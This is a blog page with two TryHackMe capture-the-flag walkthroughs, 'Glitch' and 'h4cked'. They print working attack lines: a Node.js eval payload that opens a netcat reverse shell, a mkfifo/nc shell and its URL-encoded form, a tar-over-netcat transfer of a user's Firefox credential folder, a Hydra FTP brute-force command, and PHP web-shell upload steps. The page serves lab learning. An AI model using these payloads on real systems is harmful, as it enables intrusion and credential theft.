-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label github. Show all posts
Showing posts with label github. Show all posts
  • TryHackMe Glitch Walkthrough

     


     

    The platform develops virtua l classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe Glitch Walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      

     

    Good day hacker, Spend more time in the CLI as much as you can, For that’s where we belong.


    Glitch is a easy machine from TryHackMe that proves your ability to enumerate quickly and proves the solidification of your methodology.TryHackMe Glitch Walkthrough




    Security Problem


    The app is vulnerable to command injection/execuiton via the usage of eval. The exploit code can be passed to eval and executed, so the root of the problem is is bad programming practice in Node.js, that allows an unpriviledged user to supply data which will be executed on the server.



    Let's start with a quick comprehensive nmap scan





    Here we can say that the room will turn around a website as the port 80 is open.

     

    Now let's run gobuster to enumerate all the directories
     

      


     

     

    Let’s check what is the content of this website. The page is quite empty, and we can check the source code of the page but it is quite empty as well. For curiosity, I also checked the cookies.

     









    Something looks strange here… The website sent me a cookie with the value “value”, which is weird. Ok, let’s keep it in mind!

     

     



     

    Gobuster says that there a directory /secret. Let’ check this page and the source code of the page: 



     

     

     

    The page itself doesn’t have a lot of content. However, in the source code we see a JavaScript and a getAccess to an API. Let’s check this:




    Hmm interesting! When we check this endpoint, we have a token. It looks encrypted on base64, let’s decrypt it.







    Perfect, we have our first flag and a token !

     

    Let’s try to change the value of the cookie with this token and refresh the page:

     






     

     

    Amazing! The home page changed as well.

    Let’s check the page and its source code:

     




     

    The page doesn’t have a lot of information but in the source code we can find a JavaScript file => script.js. Let’s check what this script does:

     

     

     

     

    Basically, here the script will take items in the API and show it in the browser. Let’s check those items => http://ipmachine/api/items




     

     

    We don’t have a lot of information here either. I will be clear with you, I got stuck for a while trying to figure out what is the next step.


    Finally, I decided to take a hint.

    The hint says that we should try another API method.

    As a beginner, I never played with API before. So, the only solution was to try to read and learn about API and the way that they work.

    Most of the time, an API works with GET, POST, DELETE, and so on. The hint says that we need to play around with those methods.

    In order to change the method, I used Burp.

    First let’s intercept the request.


    Turn Intercept On
     

    Go to http://ipmachine/api/items

     

     

     

     

    You can see here that the method is GET. Let’s change GET to OPTIONS, to see all the options that we can use with this API endpoint (send what you intercepted to Repeater):

     



     

     

    Basically here, we have 3 methods that we can play around with this endpoint: GET, HEAD and POST. We know already the result for GET. We don’t have results for HEAD. Let’s try POST:

     

     



     

     

    Hmm… I think we have something here, right? Someone put intentionally this message there. Maybe we are in the good way.


    From here, I needed to read more about APIs and the way that they work. If you are new as me, I will summarize what I learned about it and explain in an easy way:



    API



    The basic goal of an API is to communicate with another application. In order, to receive an information we use the method GET. However, if we want to send an information, we will use POST method.




    A quick example: let’s say we want to buy a BWM car and we go to a website where contains a search bar and we want to send a request to see all the “BMW” cars that they have in stock. Here in this example, their site communicate with another application to show the stock. The value of our search is “BMW” and the name of the variable is “cars”. The request that we will send to this API will look like this:




    http://ipmachine/api/items?cars=BMW

     

     

    Good, we know the structure of the request, but we don’t really know what is the POST request that we need to send. We will need to discover what come after “items?” (the variable “cars” in my example). To find out this we can fuzz this request and see the POST responses. In order to this, I will use wfuzz.



    PS: Just to illustrate my example, I will put the value that we expect as “bwm”:




    wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -X POST — hh 45 -u http://IPMACHINE/api/items\?FUZZ\=bwm

     

    • · -c: flag is used to show the output in colors
    • · -z: to specify the payload list.
    • · — hh 45: When we sent the POST request through burp, we saw that the content length of the “matrix message” was 45. In order to not show anymore this response, I put –hh 45. Basically here, wfuzz will hide all responses containing 45 characters. Indeed, this matrix message doesn’t have any value for us.
    • · -u: the url that you need to fuzz.

     

     

     

     
     
     
     
     
    You can see that we found a “cmd” variable that gives us an error 500. Basically, our request will look like this:

    http://IPMACHINE/api/items?cmd=...

    Let’s send this new POST request and see the result:



     
     
     
     
     
    Interesting! We got an error but we have some extra information. The value “bwm” is executed in the eval function. We can also see that they used NodeJS to build the room.


    In this part, I got stuck again… So, I told to myself: “Ok this room asks us to find the content of user.txt and root.txt. So, I can suppose that we will, in a certain way, have a RCE somewhere, right? Indeed, it is the only way because it is not possible to ssh in this room.


    I tried to google something like API RCE, API reverse shell, etc. I didn’t find anything. Then I tried NodeJS RCE and I found this writeup.


    Here CurlS explains the way that she got a reverse shell playing around an API. So I tried sending a new POST request with her payload (you need to open a listener on your machine first):



    POST REQUEST => /api/items?cmd=require(“child_process”).exec(‘nc+IPOFYOURMACHINE+1234+-e+/bin/sh’)
     



     

    Hmm… it looks very good! However, nothing happened to my listener. It looks like the payload didn’t really work but the website says that we exploited the vulnerability. Really weird, right?


    But don't let's move to the curl tool

     

    curl -X POST <machine ip>/api/items\?cmd\=ls
     
    <title>Error</title>
     
     


     

     

     

    So it's a Node.JS. Maybe I can get rce by Node.js eval ...


    Reverse shell payload :- Click Here



    Node JS Reverse shell payload :- Click Here

     

     

    cmd=require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ') 

     

     

    OR

     

    require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ') 

     

     

    First, I must encode the payload as a URL, and then It's good to go

     

     

     %63%6d%64%3d%72%65%71%75%69%72%65%28%22%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%22%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%38%2e%36%31%2e%32%33%34%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%20%27%29%0a%0a
     

     

     


     

    After decoding let's take reverse shell via curl in terminal

     

     

     

     

    This shell is a bit ugly, let’s change it => python3 -c 'import pty;pty.spawn("/bin/bash")'




     

    Let’s find user.txt file. Most of the time, we can find this file in the home directory of the user. Let’s check there first:





    Perfect, we just found the second flag. Now we need to find a way to escalate the privilege to get root and then read the file root.txt.

     

    When we visit the home folder, we can see that there is another user: v0id. Let’s check what he has in his folder:

    Nothing interesting here…

    Let’s list all the users:


     


     

     We can see here that we have 3 users that we could exploit: user (we exploited already), v0id and root.


    Our goal now is to find a way to escalate our privilege:

    • · horizontally (to v0id)
    • · vertically (to root).





    First, let’s try “sudo -l”… It doesn’t work. We need to find another way.


    Let’s go back to the user’s home directory and check what is inside:

     

    There is a .firefox directory hidden there. Basically, this directory could contain passwords saved on Firefox Browser. Maybe we can try to find something there.


    A few months ago, I read that it is possible to decrypt the content of this file. Let’s transfer this folder .firefox to our machine then decrypt it.


    In the target machine, connect back to your machine. In order to do that, go to the /home/user/.firefox then connect back to your machine from there. This will give you access (in your machine) to all the content of .firefox directory.


    In the ROOM Machine:


    cd /home/user/.firefox



    tar cf — .firefox/ | nc IPOfYourMachine 1234

    and

    in my machine we run a command

    nc -lvnp 1234 > out.tar

     

     


     

    then, lets extract the file

    tar xvf out.tar


     

     


    Now we need to change the file permission to make it executable.




    as you can see our file is extracted here...


     





    In order to find all the hidden information in this directory, we can use a script created by unode => Link GitHub



    Github File Here :- Click Here



    Clone this script to your machine:



    Now let’s decrypt the b5w4643p.default-release file:


    our file is glitch-tryhackme inside that's why we used "  ../  "

    ../.firefox/b5w4643p.default-release





    Hmm interesting! Here we can see that the user v0id used this password on the glitch.thm website. Maybe he uses the same password to login in his linux machine? Let’s try to switch to his user:




    Good, we just escalated (horizontally) the privileges to v0id user. Now let’s find a way to escalate the privilege (vertically) to the root user.


    Let’s check the basic things (as it is an “easy” room) such as: sudo -l, cron jobs, etc/shadow, etc… Nothing special there. I also run linpeas to check if there is something interesting, but I couldn’t find anything. I got stuck here for a while…


    Let’s take the last hint of the room: My friend says that sudo is bloat.


    I didn’t have any idea what it means, so I googled it and I found this video :



    Sudo Is Bloat. Use Doas Instead => Link of the YouTube Video


    Basically, doas is a kind of sudo. As we want to have a root shell, we need to execute a command like: sudo -u root /bin/bash. However, if you try with sudo, it doesn’t work.


    In the video, it says that we can use doas instead of sudo. So let’s try it:




    Finally, we got root. Let’s check the root.txt, most of the time this file is in root folder.
     
     
     



    After several hours of trying and error, we finally got the third and last flag! It was not easy at all for me. I needed to search a lot and read a lot. However, I learned a lot!



    Things that we could learn during this room:



    • · Find information in JavaScript code
    •   
    • · How API works
    •  
    • · Fuzz an URL with wfuzz
    •  
    • · RCE through NodeJS
    •  
    • · Find passwords hidden on Firefox folder.
    •  
    • · Another alternative for sudo (doas)


    In my option, they should change the difficulty of this room. Most of the concepts that we saw during this writeup are not really for beginners. They should change the difficulty to medium (intermediate).




    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


     


  • TryHackMe h4cked walkthrough


    TryHackMe h4cked walkthrough

     

    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe h4cked walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      


    It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.  TryHackMe h4cked walkthrough


    Let's Start 


    Downloading File Here :- Cick to download wireshark file


    2) The attacker is trying to log into a specific service. What service is this?

    When analyzing the pcap file, we can easily find out that attacker is trying to log into a FTP service as there are many requests and responses from FTP, as shown below.

     

     


     



    Ans :- FTP





    3) There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

    All you need to answer this question is Google search

     

     


     

     

     

    Ans:- Hydra





    4) The attacker is trying to log on with a specific username. What is the username?

    Simply type the service you found in the first question on Wireshark, and you will find the username that was used to login

     

     

     

     



    Ans :- jenny





    5) What is the user’s password?

    Search a packet that says “login successful” in the info, or you can follow a TCP STREAM of a connection that has ‘login successful’.


     

     
     
     



     

     

     Ans :- password123






    6) What is the current FTP working directory after the attacker logged in?


    We can see in the stream above that the PWD (present working directory) command was run. The response is “/var/www/html”.


      




     

     


    Ans :- /var/www/html





    7) The attacker uploaded a backdoor. What is the backdoor's filename?

    You can find the filename in the above TCP stream as “shell.php”


      


     


    Ans :- shell.php





    8) The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

    To answer this question you need to see the contents of the file that were uploaded. If you apply a display filter and only look at ftp-data you can see two streams. The first will be the directory listing, the second will be the STOR command (file upload).


    If you right-click and follow the second stream you will be able to view the contents of the file and answer the question.






     


    Ans :- http://pentestmonkey.net/tools/php-reverse-shell






    9) Which command did the attacker manually execute after getting a reverse shell?

    You just have to select a packet after executing the shell and follow TCP stream. There you can find all the commands executed by the attacker after getting the reverse shell. Thus, “whoami” is the first manual command executed by him.


     

     

     



    Ans :- whoami





    10) What is the computer’s hostname?

    When looking at the above TCP stream closely, the very first lines descrbes the OS , hostname etc. As Linux is the OS, “wir3” should be the hostname.


      


     


    Ans :- wir3





    11) Which command did the attacker execute to spawn a new TTY shell?

    Anyone with the experience of reverse shells know that we are given with an unstable shell in the first place. We need to make it stable. Most of the time we use a simple Python script to do so. We can see that this attacker also uses the same script when analyzing the above TCP stream.

    Check out Q10) number picture

    Ans:- python3 -c 'import pty; pty.spawn("/bin/bash")'





    12) Which command was executed to gain a root shell?

    The full sudo command that lets you become root user.


      



     

     



    Ans :- sudo su





    13) The attacker downloaded something from GitHub. What is the name of the GitHub project?

    We can see a git clone done by the attacker.(“Reptile” GitHub project). You just have to select a packet after executing the shell and follow TCP stream.


      

     

     



    Ans :- Reptile



    Wireshark in Networking



    Learn Wireshark :- Click Hee





    14) The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

    Follow the HINT


      


     



    Ans:- Rootkit





    Task-2



    1 ) Read the flag.txt file inside the Reptile directory

    There are some steps to get the flag.txt:


    • Step 1)


        Run Hydra to bruteforce the login to the FTP service:

        Type the command - 

     

    hydra -l jenny -P /home/hackerboy/Documents/rockyou.txt ftp://10.10.178.178

     
       
        -l – to use a specific user to login
        -P – the path to the file that contains the list of passwords to try and login





    • Step 2)


    Login to the FTP service using the credentials you found through Hydra. On the terminal just type "ftp 10.10.178.178" without double quotes and then provide the username and password you found when you bruteforce password using Hydra with username


    So, we are now successfully logged in as Jenny.







    • Step 3)


    Find the php reverse shell web shell in your Kali.
     

    locate php-reverse-shell.php







    • 4 Step)


    You can either edit the file in its location or copy it somewhere and edit the IP address(own machine IP address) and port number to set it up to get a reverse shell connection. I choose the edit first in own machine.






    • Step 5)


    Upload the web shell and change the permission with execute rights.

    In the FTP logged in session you are in, type
     

    put php-reverse-shell.php

    ls

    Now we need to change the web shell permission to make it executable, type

    chmod 777 php-reverse-shell.php

    ls

    as you can see, permissions are changed.









    • Step 6)


    let’s start a netcat listener before triggering the webshell, and so we will be able to catch a reverse shell.

    To start a netcat listener, make sure that you use the port number you entered when you edited the webshell in "Step 4", type

    nc -lnvp 1234


    Now, trigger the webshell in own browser by visiting the URL http://10.10.178.178/php-reverse-shell.php and hit enter

    Go back to your netcat listener to check if you have a reverse shell, it's a amazing let's celebtrate but wait we will take some more time.








    • Step 7)


    Switch to a more stable shell, by creating a new TTY shell, type 


    python3 -c 'import pty;pty.spawn("/bin/bash")'


    As for now, we are on “www-data”, which do not have root privileges. We know that Jenny has root privileges on the machine. So, let us change the user to Jenny and become root. It is so much simple as follows.


    su jenny

    password :- 987654321 (using step-1 Hydra)


    we are given a root shell without much effort.
     
    Type sudo -l to check what sudo privileges does user jenny currently have

      




    • Step 8)




    Type sudo su to change user as root and whoami to check if we successfully changed as root or not.

    Look for the /Reptile directory as it was indicated that flag.txt is in that location, type

    find / -type d -name Reptile 2> /dev/null

    Go to the location /root/Reptile and do cat flag.txt to retrieve the content of the flag.txt file









    Ans :- ebcefd66ca4b559d17b440b6e67fd0fd





    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


     



  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.